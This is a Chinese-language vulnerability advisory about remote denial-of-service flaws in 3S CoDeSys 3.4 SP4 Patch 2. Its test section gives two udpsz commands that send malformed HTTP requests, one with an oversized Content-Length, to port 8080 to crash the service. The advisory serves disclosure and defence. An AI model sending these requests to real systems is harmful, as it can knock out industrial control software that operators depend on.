发布日期:2011-11-30
更新日期:2011-12-05受影响系统:
3S GmbH CoDeSys 3.4 SP4 Patch 2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50854CoDeSys Automation Suite是工业自动化技术综合软件工具。CoDeSys在实现上存在多个远程拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序崩溃,拒绝服务合法用户。<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://aluigi.altervista.org/adv/codesys_1-adv.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!udpsz -T -c "POST / HTTP/1.0
Content-Length: 4294967295
" SERVER 8080 -1 udpsz -T -c "BLAH / HTTP/1.0
" SERVER 8080 -1建议:
--------------------------------------------------------------------------------
厂商补丁:3S
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.3s-software.com/index.shtml?en_CoDeSysV3_enIpswitch TFTP Server目录遍历漏洞Mozilla Firefox CSS “:visited”信息泄露漏洞相关资讯 漏洞 CoDeSys
- 快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
- CoDeSys "Gateway Server"多个安全 (02/22/2013 08:54:22)
- CoDeSys不明细节目录遍历漏洞 (10/30/2012 18:53:02)
| - CODESYS Gateway Server释放后重用 (05/25/2013 06:14:48)
- CoDeSys Control服务CmbWebserver. (12/01/2012 09:28:07)
- 软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|